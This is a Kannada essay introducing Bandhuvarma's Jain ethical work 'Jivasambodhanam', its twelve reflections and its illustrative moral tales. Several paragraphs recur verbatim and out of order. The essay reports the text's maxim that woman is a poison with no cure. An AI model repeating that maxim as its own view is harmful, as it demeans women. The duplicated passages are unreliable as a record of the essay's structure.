ನೀತಿಕತೆಗಳ ಸಂಕಲನ ಬಂಧುವರ್ಮನ ‘ಜೀವಸಂಬೋಧನಂ’

ಈ ಕೃತಿಯು ಜೀವಕ್ಕೆ ಒಳಿತನ್ನು ಮತ್ತು ಮಾನವಧರ್ಮವನ್ನು ಬೋಧಿಸುತ್ತಲೇ ಜೈನಧರ್ಮದ ತತ್ವಗಳನ್ನು ಅನುಸರಿಸಿ ಮೋಕ್ಷದ ಕಡೆಗೆ ಸಾಗಲು ಅನುವಾಗುವ ಅನೇಕ ಅಂಶಗಳನ್ನು ಉದಾಹರಣೆ ಸಹಿತವಾಗಿ ವಿವರಿಸುವ ಗ್ರಂಥವಾಗಿದೆ.

ಕನ್ನಡ ಸಾಹಿತ್ಯ ಪರಂಪರೆಯಲ್ಲಿ ಜೈನಸಾಹಿತ್ಯದ ಹರಹು ತುಂಬ ವಿಸ್ತಾರವಾದುದು. ಈ ಜೈನಸಾಹಿತ್ಯದಲ್ಲಿ ಕಾವ್ಯಕೃತಿಗಳ ಜೊತೆಗೆ ಲಕ್ಷಣ, ಅಲಂಕಾರ, ಛಂದಸ್ಸು, ಜ್ಯೋತಿಷ್ಯ, ವೈದ್ಯ… ಹೀಗೆ ಅನೇಕ ಬಗೆಯ ಶಾಸ್ತ್ರ ಕೃತಿಗಳನ್ನೂ ಕಾಣಬಹುದು. ಕಾವ್ಯಕೃತಿಗಳು ಲೌಕಿಕ, ಆಗಮಿಕ ಎಂಬ ಎರಡು ಕಾವ್ಯ ಮಾದರಿಗಳಲ್ಲಿ ಅಭಿವ್ಯಕ್ತಿಗೊಂಡಿದ್ದರೆ, ಇತ್ತ ಲೌಕಿಕವೂ ಧಾರ್ಮಿಕವೂ ಅಲ್ಲದ, ಅತ್ತ ಶಾಸ್ತ್ರವೂ ಅಲ್ಲದ ಕೃತಿಗಳನ್ನೂ ಈ ಜೈನಸಾಹಿತ್ಯ ಪರಂಪರೆಯಲ್ಲಿ ಕಾಣಬಹುದು. ಅವುಗಳಲ್ಲಿ ಬಂಧುವರ್ಮನ ‘ಜೀವಸಂಬೋಧನಂ’ ಕೃತಿಯೂ ಒಂದು. ಇದು ಪ್ರಕಾರದ ದೃಷ್ಟಿಯಲ್ಲಿ ಕಾವ್ಯದಂತೆ ಕಂಡುಬಂದರೂ ವಸ್ತುವಿನ ದೃಷ್ಟಿಯಲ್ಲಿ ಬೇರೆಯದೇ ಆಗಿ ನಿಲ್ಲುತ್ತದೆ.

‘ಜೀವಸಂಬೋಧನಂ’ ಕೃತಿಯು ಜೈನತತ್ವಗಳನ್ನು ಅನುಸರಿಸಿಕೊಂಡು ಮನುಷ್ಯಧರ್ಮವನ್ನು ಬೋಧಿಸುವ ನೀತಿಬೋಧನಾ ಗ್ರಂಥ. ನೀತಿಬೋಧನೆಯನ್ನು ಕಾವ್ಯಪ್ರಕಾರದ ಶೈಲಿಯಲ್ಲಿ ತಿಳಿಸಿದರೂ ಇದು ಕಾವ್ಯವಲ್ಲ. ಜೈನತತ್ವಗಳನ್ನು ಅಳವಡಿಸಿಕೊಳ್ಳುವಂತೆ ಬೋಧಿಸಿದರೂ ಧಾರ್ಮಿಕ ಗ್ರಂಥವಲ್ಲ. ಇದೊಂದು ಮನುಷ್ಯಧರ್ಮವನ್ನು ತಿಳಿಸುವ ನೀತಿಗ್ರಂಥ. ಮನುಷ್ಯ ಧರ್ಮದ ಅನೇಕ ಸಂಗತಿಗಳಿಗೆ ಪೂರಕ ಅಥವಾ ಆನ್ವಯಿಕವೆಂಬಂತೆ ಸಾಂದರ್ಭಿಕ ಕತೆಗಳನ್ನೂ ಕೊಟ್ಟಿರುವುದರಿಂದ ಇದನ್ನು ನೀತಿಕತೆಗಳ ಸಂಕಲನ ಎಂದರೂ ತಪ್ಪಾಗಲಾರದು.

‘ಜೀವಸಂಬೋಧನಂ’ ಕೃತಿಯು ಹೆಸರೇ ಸೂಚಿಸುವಂತೆ ಜೀವವನ್ನು ಸಂಬೋಧಿಸುತ್ತ ಮಾನವಧರ್ಮದ ನೀತಿಯನ್ನು ಬೋಧಿಸುವ ಗ್ರಂಥ. ಜೀವಕ್ಕೆ ಉಪದೇಶದಂತೆ ತಿಳಿಹೇಳುವ ಈ ಕೃತಿಗೆ ‘ಜೀವಸಂಬೋಧನಂ’ ಎಂಬ ಹೆಸರು ಸೂಕ್ತವೂ ಅರ್ಥಪೂರ್ಣವೂ ಆಗಿದೆ. ಇದು ದರ್ಶನಾರಾಧನೆ, ಜ್ಞಾನಾರಾಧನೆ, ಚಾರಿತ್ರಾರಾಧನೆ ಮತ್ತು ತಪಾರಾಧನೆ ಎಂಬ ನಾಲ್ಕು ಆರಾಧನೆಗಳನ್ನು ಒಳಗೊಂಡು; ಅಧ್ರುವ, ಅಶರಣ, ಏಕತ್ವ, ಅನ್ಯತ್ವ, ಸಂಸಾರ, ಲೋಕ, ಅಶುಚಿತ್ವ, ಆಸ್ರವ, ಸಂವರ, ನಿರ್ಜರ, ಬೋಧಿದುರ್ಲಭ, ಧರ್ಮ -ಎಂಬ ಹನ್ನೆರಡು ಅನುಪ್ರೇಕ್ಷೆಗಳಲ್ಲಿ ವಿವರಿಸಲ್ಪಟ್ಟ ಕೃತಿ. ಬದುಕಿನಲ್ಲಿ ನಮೆವ ಜೀವಕ್ಕೆ ಹಿತವೆಂದು ಅರ್ಥವಾಗುವಂತೆ ಕೆಲವು ನೀತಿಕತೆಗಳ ಮೂಲಕ ಮನುಷ್ಯಧರ್ಮದ ಸಂಗತಿಗಳನ್ನು ತಿಳಿಸಿ, ಅವನ್ನು ಬದುಕಿಗೆ ಅಳವಡಿಸಿಕೊಳ್ಳುವುದರಿಂದ ಅನಂತ ಸುಖವನ್ನು ಶಾಶ್ವತವಾಗಿ ಪಡೆಯಬಹುದು ಎಂದು ಪ್ರೇರೇಪಿಸುವುದು ಇದರ ಪ್ರಧಾನ ಆಶಯ.

ಮನುಷ್ಯನು ತನ್ನ ಉತ್ತಮ ಶಕ್ತಿಗಳನ್ನು ಧ್ರುವಗಳೆಂದೂ, ಕರ್ಮದಿಂದಾದ ದೇಹ, ಹೆಂಡತಿ ಮತ್ತು ಸಂಪತ್ತನ್ನು ಅಧ್ರುವಗಳೆಂದು ವಿಭಾಗಿಸಿ, ನೀರಮೇಲಿನ ಗುಳ್ಳೆಗಳಂತಿರುವ ಮತ್ತು ಅಶಾಶ್ವತವೆನಿಸುವ ಸಂಪತ್ತೆಂಬ ಅಧ್ರುವಗಳನ್ನು ಮನಸ್ಸಿನಿಂದ ತೊಡೆದು ಹಾಕಿ ಶಾಶ್ವತ ಸುಖದ ಕಡೆಗೆ ಹೊರಳಬೇಕೆಂಬುದು ಇದರ ಪ್ರಧಾನ ಉದ್ದೇಶ. ಮನುಷ್ಯನನ್ನು ಆಸೆಗೆಳೆಸುವ ವಸ್ತುಗಳೇ ಅವನನ್ನು ಪಾಪದ ಕೂಪಕ್ಕೆ ತಳ್ಳುತ್ತವೆ. ಪಾಪಗಳಿಂದ ಸಾವು ತಪ್ಪದು. ಹಾಗಾಗಿ ‘ಒಡಮೆಯೊಳ್ ಎಂತುಂ ಆತ್ಮ ಸುಖಮಾಗದು. ತಕ್ಕೆಡೆಗೆ ಒಳ್ಳಿತ್ತರ್ಥಮಂ ಕುಡೆ ಸುಖಮಕ್ಕುಂ’ ಎಂಬ ಭಾವನೆಯಿಂದ ಮತ್ತು ‘ಸಾಗುದುರೆಗೆ ಪುಲ್ಲನಡಕುವಂತೆ’ ಶಾಶ್ವತವಲ್ಲದ ಬದುಕಿನಲ್ಲಿ ಅರ್ಥ, ಭಯ, ಲೋಭ ಮುಂತಾದವು ಜೀವಕ್ಕೆ ಒಳ್ಳೆಯವಲ್ಲ ಎಂದು ಅರಿತು ಬೇಗ ಸುಖಿಯಾಗುವ ಕಾರ್ಯದಲ್ಲಿ ತೊಡಗಿಕೊಳ್ಳಬೇಕು. ಅದು ಕೇವಲ ಮೋಹಕ್ಷಯದಿಂದ ಮಾತ್ರ ಸಾಧ್ಯವಾಗುತ್ತದೆ.

ಅಂಕುರವೂ ಬೇರೂ ಬೀಜದಿಂದ ಆಗುವಂತೆ, ರಾಗದ್ವೇಷಗಳು ಮೋಹದಿಂದ ಆಗುವಂಥವು. ಮೋಹವನ್ನು ಕೆಡಿಸಿದರೆ ಕರ್ಮಗಳು ಕೆಡುವುವು, ಕರ್ಮ ಕೆಟ್ಟರೆ ಶಾಶ್ವತ ಸುಖ ದೊರೆಯುವುದು. ಇಲ್ಲದಿದ್ದರೆ ತಾನು ಎಷ್ಟೇ ಸಂಪತ್ತಿನ ಒಡೆಯನಾಗಿದ್ದರೂ ಸಾವು ತಪ್ಪುವುದಿಲ್ಲ. ಸಾವಿಗೆ ದುಃಖಿಸುವುದೂ ತರವಲ್ಲ. ಸಾವು ಅನಿವಾರ್ಯ. ಇದು ಎಲ್ಲರ ಮನೆಯಲ್ಲೂ ನಡೆಯುವ ಸಹಜ ಕ್ರಿಯೆ ಎಂದು ತಿಳಿಸುತ್ತಲೇ ಇದನ್ನು ಮನದಟ್ಟು ಮಾಡುವುದಕ್ಕೆ ಸಗರನ ಮಕ್ಕಳ ಮರಣದ ಸಂಗತಿಯನ್ನು ಮತ್ತು ಬ್ರಾಹ್ಮಣನ ಮಗನ ಮರಣದ ಕತೆಯನ್ನು ವಿವರಿಸಿರುವುದು ಬಹುಸೂಕ್ತವಾಗಿದೆ. ಅಂತೆಯೆ ಮುಂಡಕೌಶಿಕನ ಕತೆಯಲ್ಲಿ ಸಾವಿನಿಂದ ಯಾರಿಗೂ ವಿನಾಯಿತಿ ಇಲ್ಲ ಎಂದು ತಿಳಿಸುತ್ತ, ‘ಮೃತ್ಯುವೆಯ್ದೆವಂದೊಡಾರ್ಗಂ ಕಾಯಲರಿದು’, ‘ಮರಣ ಬಂದ ದಿನ ಶರಣು ನಿನಗಾರೂ ಇಲ್ಲ. ಜಿನೇಶ್ವರನ ಚರಣವೇ ಮಹೋಗ್ರ ಪಾಪನಾಶನಂ’ ಎಂದು ಬಗೆದು ಜೈನಧರ್ಮದ ಕಡೆ ಒಲವನ್ನು ತೋರಬೇಕೆಂದು ಪ್ರೇರೇಪಿಸುತ್ತಾನೆ.

ಕಂಟಕ ಎದುರಾದಾಗ ರಕ್ಷಿಣೆಗಾಗಿ ಮತ್ತೊಬ್ಬರಲ್ಲಿ ಶರಣು ಹೋಗದೆ, ಅಶರಣತ್ವವನ್ನು ಪಾಲಿಸುವುದು ಒಳ್ಳೆಯದು. ಚಂದ್ರನನ್ನು ರಾಹು ಹಿಡಿದಾಗ ಶಿವನಿಂದಲೂ ಕಾಪಾಡಲಾಗುವುದಿಲ್ಲ, ಅಮಾವಾಸ್ಯೆಯಂದು ಚಂದ್ರನನ್ನು ಸೂರ್ಯನೂ ಪೂರ್ಣಚಂದ್ರನನ್ನಾಗಿ ಮಾಡಲು ಸಾಧ್ಯವಾಗುವುದಿಲ್ಲ. ಹಾಗಾಗಿ ‘ಹೇ ಜೀವವೆ ಮೋಹವನ್ನು ಬಿಸುಟು, ದೋಷಗಳನ್ನು ಕಳೆದು, ಸಂಸಾರ ವ್ಯಾಪಾರಕ್ಕೆ ಹೊರಗಾಗಿ ನಿತ್ಯಸುಖವನ್ನು ಕಾಣಬೇಕಾದರೆ ತಪಕ್ಕೆ ಶರಣಾಗು. ಬರುವ ದೋಷಗಳೆಲ್ಲವೂ ತಪದಿಂದ ಕೆಡುವುವು’ ಎಂದು ಈ ಕೃತಿಯಲ್ಲಿ ಜೀವಕ್ಕೆ ಬೋಧಿಸಲಾಗಿದೆ.

ಹೀಗೆ ಯಾವುದೇ ಆಗಿರಲಿ ಅದರಲ್ಲಿ ಇರುವುದು ನೀನೊಬ್ಬನೇ ಅನ್ನುವುದನ್ನು ಮರೆಯಬೇಡ. ಜವನೆಂಬ ಮಹೋಗ್ರ ರಾಕ್ಷಸ ತನಗಿಷ್ಟೆಲ್ಲ ಗುಣವಿದ್ದರೂ ಕರುಣೆಯಿಲ್ಲದ ಕೊಲ್ಲುವಾಗ ನೀನೊಬ್ಬನೇ ಮಡಿವೆ. ಧನ, ದರ್ಪ, ಮುಳಿಸು, ಸಜ್ಜನ ಸಂಬಂಧ, ದುವ್ರ್ಯಸನ, ಸೊಕ್ಕು, ಬೆಳ್ತನ ಎಲ್ಲವನ್ನೂ ತವಿಸಲು ನೀನೇ ಪ್ರಯತ್ನಿಸಬೇಕು, ಬೇರಾರು ನೆರವಾಗರು ಜೀವನೇ ಎನ್ನಲಾಗಿದೆ.

ಅಂತೆಯೆ ಮನುಷ್ಯನು ಹುಟ್ಟಿನಿಂದಲೂ ಒಂಟಿಯೇ. ತಾಯ ಗರ್ಭದಲ್ಲಿದ್ದಾಗ ಒಬ್ಬನೇ ದುಃಖವನ್ನುಣ್ಣುವ, ತೊಟ್ಟಿಲಲ್ಲಿ ಒಬ್ಬನೇ ಬೆಳೆಯುವ, ಯೌವನದಲ್ಲಿ ಮತ್ತು ಮುಪ್ಪಿನಲ್ಲಿ ಒಬ್ಬನೇ ನಮೆವ… ಹಾಗಾಗಿ ‘ನಿನಗೆ ನೀನೇ, ಪೆರರ್ ನಿನಗಿಲ್ಲ’ ಎಂಬ ಭಾವ ಮೂಡುವಂತೆ ಜೀವಕ್ಕೆ ತಿಳಿಸುತ್ತ ಕಡೆಯಲ್ಲಿ ಸನ್ನುತ ಜಿನಧರ್ಮವೊಂದೇ ನಿನಗೆ ನೆರವಾಗುವುದು ಎಂದು ಏಕತ್ವದ ವಿಚಾರವನ್ನು ಪ್ರಸ್ತಾಪಿಸುತ್ತಾನೆ.. ಸೋಲು, ಗೆಲುವು, ಮೋಹಪಾಶ, ಗುಣಗಣಗಳಲ್ಲಿ ಮೆರೆದಾಡುವುದು… ಹೀಗೆ ಯಾವುದೇ ಆಗಿರಲಿ ಅದರಲ್ಲಿ ಇರುವುದು ನೀನೊಬ್ಬನೇ ಅನ್ನುವುದನ್ನು ಮರೆಯಬೇಡ. ಜವನೆಂಬ ಮಹೋಗ್ರ ರಾಕ್ಷಸ ತನಗಿಷ್ಟೆಲ್ಲ ಗುಣವಿದ್ದರೂ ಕರುಣೆಯಿಲ್ಲದ ಕೊಲ್ಲುವಾಗ ನೀನೊಬ್ಬನೇ ಮಡಿವೆ. ಧನ, ದರ್ಪ, ಮುಳಿಸು, ಸಜ್ಜನ ಸಂಬಂಧ, ದುವ್ರ್ಯಸನ, ಸೊಕ್ಕು, ಬೆಳ್ತನ ಎಲ್ಲವನ್ನೂ ತವಿಸಲು ನೀನೇ ಪ್ರಯತ್ನಿಸಬೇಕು, ಬೇರಾರು ನೆರವಾಗರು ಜೀವನೇ ಎನ್ನಲಾಗಿದೆ.

ರಾಗದ್ವೇಷ ಎಂಬ ಎರಡನ್ನೂ ಕಳೆದು, ಕೆಟ್ಟ ಹಠವನ್ನೂ ತೊರೆದು, ಶುದ್ಧ ಚಾರಿತ್ರದೊಳು ದೀಕ್ಷೆಗೈದು ಆಚಾರ್ಯರ ಪಕ್ಕದಲ್ಲಿ ವ್ರತಗಳನ್ನು ಏರಿಸಿಕೊಂಡು, ಸಂಯಮ ಧರ್ಮಾಚಾರಣೆಗಳನ್ನು ಕಲಿತು, ಏಕವಿಹಾರಿಯಾಗಿ ಗಿರಿ ಕಂದರ ಗಹ್ವರದಲ್ಲಿ ಹೊಕ್ಕು ಧ್ಯಾನಿಸಬೇಕು. ಪಾಪವಿನಾಶಕ್ಕಾಗಿ ಸಲ್ಲೇಖನಕ್ಕೆ ತೊಡಗಬೇಕು. ಇದರಲ್ಲಿ ಸಿಗುವ ಸುಖವು ದೇವೇಂದ್ರರ, ಚಕ್ರವರ್ತಿಗಳ, ನಾಗೇಂದ್ರರ ಸುಖಕ್ಕಿಂತಲೂ ಮಹತ್ತರವಾದುದು ಎಂದು ತಪಕ್ಕೆ ಆದ್ಯತೆ ಕೊಡಬೇಕೆನ್ನುತ್ತಾನೆ. ಇದಕ್ಕೆ ಪೂರಕವಾಗಿ ವರಾಂಗನ ಕತೆಯಲ್ಲಿ ವರಾಂಗನನ್ನು ಎದುರಿಸುವ ಅನೇಕ ಕಷ್ಟಗಳಲ್ಲಿ ಅವನೊಬ್ಬನೇ ಇದ್ದುದನ್ನು ತಿಳಿಸುವುದೂ ಏಕತ್ವಕ್ಕೆ ಆಧ್ಯತೆ ಕೊಡಬೇಕೆನ್ನುವುದೇ ಆಗಿದೆ.

‘ಸ್ತ್ರೀಯೆಂಬ ಪಾವಿನ ವಿಷಂ ಮುಳಿದುಮೊಸೆದುಮೆಂತುಂ ಕೊಲ್ವುದು ಆ ವಿಷಕ್ಕೆ ಮರ್ದುಂಟೆ’ ಎಂಬಲ್ಲಿ ಹುಸಿ ಸ್ತ್ರೀ ಎಂಬ ವಿಷವನ್ನು ತನ್ನ ಬಳಿಯಲ್ಲಿ ಇಟ್ಟುಕೊಳ್ಳಬೇಡ. ಆ ವಿಷಕ್ಕೆ ಔಷಧಿಯಿಲ್ಲ. ಹಾಗಾಗಿ ಸ್ತ್ರೀಗಿಂತಲೂ ಉಗ್ರವಾದ ವಿಷವಾವುದೂ ಇಲ್ಲ ಎನ್ನುತ್ತಾನೆ.

ಹಾಗೆಯೆ ತನ್ನ ಬದುಕಿನಲ್ಲಿ ದಕ್ಕಿದ ಎಲ್ಲ ವಸ್ತುಗಳನ್ನು ಬೇರೆಯವೆಂದು ಬಗೆಯಬೇಕು, ಅವುಗಳ ಕಡೆಗೊಂದು ನಿರ್ಲಕ್ಷ್ಯ ನೋಟ ಬೀರಬೇಕೆಂಬುದು ಇನ್ನೊಂದು ಆಶಯ. ದ್ರವ್ಯ, ಹೆಂಡತಿ ಮತ್ತು ತನು ಇವ್ಯಾವೂ ನಿನ್ನೊಂದಿಗೆ ಇರುವುದಿಲ್ಲ. ಅವು ಬೇರೆ ಎಂದು ಅನ್ಯತ್ವವನ್ನು ಭಾವಿಸುವುದು ಒಳ್ಳೆಯದು. ಅವೆಲ್ಲವೂ ಬಿಸಿಲುಕುದುರೆಯಂತೆ ಕಾಣುವ ನೀರಿದ್ದಂತೆ, ಹತ್ತಿರ ಸಾರಿದರೆ ಅದೊಂದು ಭ್ರಮೆ ಎಂದರಿವಿಗೆ ಬರುವುದನ್ನು ತಿಳಿಯಬೇಕು. ಜೊತೆಗೆ ‘ಪುಸಿ ಪೆಂಡಿರ್ ಕಡೆಗಣ್ಣೋಟದೆ ಕೊಲ್ವರ್’ ಎಂಬ ಮಾತನ್ನು ಪ್ರಸ್ತಾಪಿಸುತ್ತ ತಾನು ಯಾವುದನ್ನು ತನ್ನದೆಂದು ಬಗೆಯುವನೋ ಅದೇ ವಿಷವಾಗಿ ಕೊಲ್ಲುತ್ತದೆ. ‘ಸ್ತ್ರೀಯೆಂಬ ಪಾವಿನ ವಿಷಂ ಮುಳಿದುಮೊಸೆದುಮೆಂತುಂ ಕೊಲ್ವುದು ಆ ವಿಷಕ್ಕೆ ಮರ್ದುಂಟೆ’ ಎಂಬಲ್ಲಿ ಹುಸಿ ಸ್ತ್ರೀ ಎಂಬ ವಿಷವನ್ನು ತನ್ನ ಬಳಿಯಲ್ಲಿ ಇಟ್ಟುಕೊಳ್ಳಬೇಡ. ಆ ವಿಷಕ್ಕೆ ಔಷಧಿಯಿಲ್ಲ. ಹಾಗಾಗಿ ಸ್ತ್ರೀಗಿಂತಲೂ ಉಗ್ರವಾದ ವಿಷವಾವುದೂ ಇಲ್ಲ ಎನ್ನುತ್ತಾನೆ.

ಅಂತೆಯೇ ಉರಿಯ ನೆರಳು, ನೆಂಟರ ಮೋಹ ಇವೆರಡು ಯಾರಿಗೂ ಸುಖವನ್ನು ತಂದುಕೊಡುವುದಿಲ್ಲ. ಹಾಗಾಗಿ ‘ಎಲೆ ಜೀವ ತನಗೆ ಅತ್ಯಂತ ಸುಖವನ್ನು ಕೊಡುವವನೇ ನಂಟ, ದುಃಖವನ್ನು ತರುವವನೇ ಶತ್ರು. ತನಗೆ ಅತಿ ದುಃಖ ತರುವ ನಂಟರನ್ನು ಶತ್ರುವೆಂದು ಭಾವಿಸು’ ಎನ್ನುತ್ತಾನೆ.. ಹಾಗೆಯೇ ಮೇಳ್ಪಟ್ಟು, ಮತಿಗೆಟ್ಟು, ಛಿಃ ಬಾಯ್ವಿಟ್ಟು ಶರೀರಮನೆ ನಂಬಿ ಕಿಡದಿರ್ ಜೀವಾ. ನಿನ್ನನ್ನು ಕೆಡಿಸುವ ಮೈಯ ವಶವಾಗಬೇಡ’ ಎಂದು ತಿಳಿಸುತ್ತ, ಈ ದೇಹವನ್ನು ವ್ರತಗಳಲ್ಲಿ ದಂಡಿಸದಿದ್ದರೆ ಮತ್ತೆ ವಶ ಮಾಡಿಕೊಳ್ಳಲು ಆಗದು. ಬೇಗೆಯು ಕಿಚ್ಚಿನಿಂದ, ತಂಪು ನೀರಿನಿಂದ ಎಂಬಂತೆ, ದುಃಖವು ಪಾಪದಿಂದ, ಸುಖವು ಧರ್ಮದಿಂದ ಎಂದು ತಿಳಿದು ರಾಗ ದ್ವೇಷಗಳನ್ನು ದೂರ ಮಾಡಿಕೊಂಡು ವಸ್ತುಗಳನ್ನು, ಹೆಂಡತಿಯನ್ನು, ತನ್ನವರನ್ನೂ, ತನ್ನ ದೇಹವನ್ನೂ ತನ್ನದಲ್ಲವೆಂದು ಬಗೆ ಎಂದು ತಿಳಿಸುವುದೂ ಇದರ ಮುಖ್ಯ ಉದ್ದೇಶ.

ಹಾಗಾಗಿ ಸಂಸಾರದಿಂದಲೂ ಹೊರಬರಬೇಕೆನ್ನುವುದು ಇದರ ಆಶಯ. ಹಾಗೆಯೆ ಕಡುಗೆಳೆಯನೆಂದು ಬಗೆವ ಮಿತ್ರನು ಕೆಲವೊಮ್ಮೆ ಕಡುದ್ವೇಷಿಯಾಗಿ ಕೊಲ್ಲುವನು, ಉದಾರಿಯೂ ಕೆಲವೊಮ್ಮೆ ಕಿಸುಗುಳವಾಗಿ ಪರಿವರ್ತಿನಾಗಬಲ್ಲ.

ಅಂತೆಯೆ ಸಂಸಾರ ಸಂಕೀರ್ಣವಾದುದೆಂದು ತಿಳಿಸುತ್ತ, ‘ಸಂಸಾರ ಕಾಂತಾರದೊಳ್ ಪೊಲಗೆಟ್ಟಕ್ಕಟ ಸೇದೆವಟ್ಟು ತಿರಿಗುಂ’ ಈ ಸಂಸಾರವು ಮನುಷ್ಯನನ್ನು ಹೊಲೆಗೆಡಿಸುವುದಲ್ಲದೆ ಆಯಾಸದಿಂದ ಬಳಲಿಸಿ, ದಿಕ್ಕೆಟ್ಟು ತಿರುಗಿಸುತ್ತದೆ. ‘ಸಂಸಾರದೊಳಗಿರ್ದನ ಕೇಡಿಂಗಂ ಸಮುದ್ರದೊಳಗಳ್ದನ ಸಾವಿಂಗಮೇಂ ಸಂದೇಯಮೇ?’ ಎಂಬ ಮಾತಿನಲ್ಲಿ ಸಂಸಾರವು ಮನುಷ್ಯನನ್ನು ಕೊಲ್ಲುತ್ತದೆ. ಹಾಗಾಗಿ ಸಂಸಾರದಿಂದಲೂ ಹೊರಬರಬೇಕೆನ್ನುವುದು ಇದರ ಆಶಯ. ಹಾಗೆಯೆ ಕಡುಗೆಳೆಯನೆಂದು ಬಗೆವ ಮಿತ್ರನು ಕೆಲವೊಮ್ಮೆ ಕಡುದ್ವೇಷಿಯಾಗಿ ಕೊಲ್ಲುವನು, ಉದಾರಿಯೂ ಕೆಲವೊಮ್ಮೆ ಕಿಸುಗುಳವಾಗಿ ಪರಿವರ್ತಿನಾಗಬಲ್ಲ. ಹೀಗೆ ಅನೇಕ ಸಂಬಂಧಗಳು ಕೆಲವಾನು ಸಂದರ್ಭಗಳಲ್ಲಿ ಒಂದೇ ಆಗಿ ಉಳಿಯುವುದಿಲ್ಲ ಎಂದು ತಿಳಿಸುತ್ತ ಇದಕ್ಕೆ ಪೂರಕವಾಗಿ ವಸಂತ ತಿಲಕೆಯೆಂಬ ವೇಶ್ಯೆಯ ಕತೆಯನ್ನು ಪ್ರಸ್ತಾಪಿಸುತ್ತಾನೆ.

ಈ ಕತೆಯಲ್ಲಿ ಅರಿವಿಲ್ಲದೆ ಸಂಬಂಧಗಳೇ ಕೆಲವೊಮ್ಮೆ ಅನೈತಿಕ ಸಂಬಂಧಗಳಾಗುವುದನ್ನು ತಿಳಿಸುತ್ತದೆ. ಅದನ್ನು ಈ ಲಾಲಿ ಹಾಡಿನಲ್ಲಿ ಅರಿಯಬಹುದು. ‘ಜೋ ಜೋ ನೀ ಮಗನೆ, ತಮ್ಮನೆ.. ಜೋ ನೀನು ಅಳಿಯನೆ, ಮೈದುನನೆ… ನಾ ನಿನಗೆ ಕಿರಿಯಮ್ಮ, ಜೋ ನಿಮ್ಮಮ್ಮನಿಗೆ ಮೊಮ್ಮಗನೆ… ಜೋ ನಿಮ್ಮಪ್ಪನಿಗೆ ತಮ್ಮನೇ ಜೋ ಜೋ…’, ‘ಜೋ ನಿನಗಾದ ತಾಯಿ ನನಗೂ ತಾಯಿ… ಅಕ್ಕ, ಅತ್ತೆಯೂ ಕೂಡ. ದುರಜ್ಞಾನದಿಂದ ಮತ್ತು ಪಾಪದಿಂದ ನನಗೆ ಅತ್ತಿಗೆಯೂ ಆದಳು. ಜೋ ಜೋ ನಿನಗಾದ ತಂದೆ ನನಗೆ ಅಣ್ಣ, ಗಂಡ, ತಂದೆಯೂ ಆದ. ಇದೆಲ್ಲವೂ ಕಡುಪಾಪದ ಬಂಧನವಲ್ಲವೆ ಬಾಲಕಾ’ ಎಂಬ ಮಾತುಗಳಲ್ಲಿ ಸಂಬಂಧಗಳ ಸಂಕೀರ್ಣತೆಯನ್ನು ಪರಿಚಯಿಸುತ್ತಾನೆ.

ಹಣದ ಕೇಡು ಮತ್ತು ಗುಣದ ಕೇಡು ಈ ಎರಡೂ ದುಃಖವುಂಟು ಮಾಡುವುವು. ಪರೋಪಕಾರಗಳಿಂದ ಇಂಥ ದುಃಖಗಳನ್ನು ನೀಗಬಹುದು. ಇಲ್ಲಿ ಸುಖಿಯಾಗಿದ್ದರೆ ಮರುಜನ್ಮದಲ್ಲೂ ಸುಖಿಯಾಗಲು ಸಾಧ್ಯ. ಮನೆಯ ದೀಪವು ರಾತ್ರಿಯಲ್ಲಿ ಬೆಳಕನ್ನು ಕೊಡುವಂತೆ, ಮನುಷ್ಯನೊಳಗಿನ ಗುಣವು ಮನುಷ್ಯ ಭವದ ಪೊಲ್ಲಮೆಗಳನ್ನು ಈಡಾಡಿ ಎಲ್ಲಕ್ಕೂ ಮಿಗಿಲೆನಿಸಿದ ಚೈತನ್ಯ ನೀಡುತ್ತದೆ. ಹಾಗಾಗಿ ಗುಣಗಳನ್ನು ರೂಢಿಸಿಕೊಳ್ಳುವುದು ಉತ್ತಮವೆಂದು ತಿಳಿಸುತ್ತಾನೆ. ಇದಕ್ಕೆ ಪೂರಕವಾದ ಅಂಶಗಳನ್ನು ಸುಕುಮಾರನ ಕತೆಯಲ್ಲಿ ತಿಳಿಸುವುದನ್ನು ಕಾಣಬಹುದು.

ಹಾಗಾಗಿ ಹೊರ ಮತ್ತು ನಡುವಣ ಭಾಗವನ್ನು ದೂರಮಾಡಿ ಜ್ಞಾನಮಯವಾದುದನ್ನು ಇಟ್ಟುಕೊಳ್ಳಬೇಕೆಂದು ಪ್ರೇರೇಪಿಸುತ್ತಾನೆ.. ಕೂಸು ಬಸಿರೊಳಗಿದ್ದು ತಾನು ಕಾರಿದುದನ್ನೇ ತೆಗೆದುಂಡು, ಕರ್ಮದಿಂದ ಅಮೇಧ್ಯದಲ್ಲಿ ನೆಲಸಿರುವುದರಿಂದ ಇವೆಲ್ಲವೂ ಅಶುಚಿತ್ವವಾಗಿ ಕಾಣುತ್ತವೆ.

ಹಾಗೆಯೆ ಶರೀರದ ನಶ್ವರತೆ ಮತ್ತು ಸಂಬಂಧಗಳೇ ಕೇಡಿನ ಸಂಕೇತ ಎಂಬುದನ್ನು, ‘ಪುಟ್ಟೆ ತಾಯ್, ಸಾವೇ ಪಿತೃ, ನಾನಾ ವಿಧ ರುಜೆಗಳೆ ಸಹೋದರರ್ ಮುಪ್ಪೆ ಕೆಳೆಯರ್’ ಎಂಬ ಮಾತುಗಳಿಂದ ತಿಳಿಸಿ, ಜೀವಾ ನಿನ್ನ ತನುವನ್ನು ಮೆಚ್ಚುವುದು ಎಷ್ಟು ಸರಿ ಎಂದು ಪ್ರಶ್ನಿಸುವ ಮೂಲಕ ಮೈಯಲ್ಲಿನ ಮೂರು ಪೊರೆಗಳ ಬಗೆಗೆ ತಿಳಿಸುತ್ತಾನೆ. ಅವುಗಳಲ್ಲಿ ಧಾತು ಮಲಾದಿಗಳನ್ನು ಹೊಂದಿ ದೋಷಸಹಿತವಾದುದು ಹೊರಗಣ ಭಾಗ, ಕರ್ಮಬಂಧವಾದುದು ನಡುವಣ ಭಾಗ, ಜ್ಞಾನಮಯವಾದುದು ಒಳಗಣ ಭಾಗ. ಹಾಗಾಗಿ ಹೊರ ಮತ್ತು ನಡುವಣ ಭಾಗವನ್ನು ದೂರಮಾಡಿ ಜ್ಞಾನಮಯವಾದುದನ್ನು ಇಟ್ಟುಕೊಳ್ಳಬೇಕೆಂದು ಪ್ರೇರೇಪಿಸುತ್ತಾನೆ.. ಕೂಸು ಬಸಿರೊಳಗಿದ್ದು ತಾನು ಕಾರಿದುದನ್ನೇ ತೆಗೆದುಂಡು, ಕರ್ಮದಿಂದ ಅಮೇಧ್ಯದಲ್ಲಿ ನೆಲಸಿರುವುದರಿಂದ ಇವೆಲ್ಲವೂ 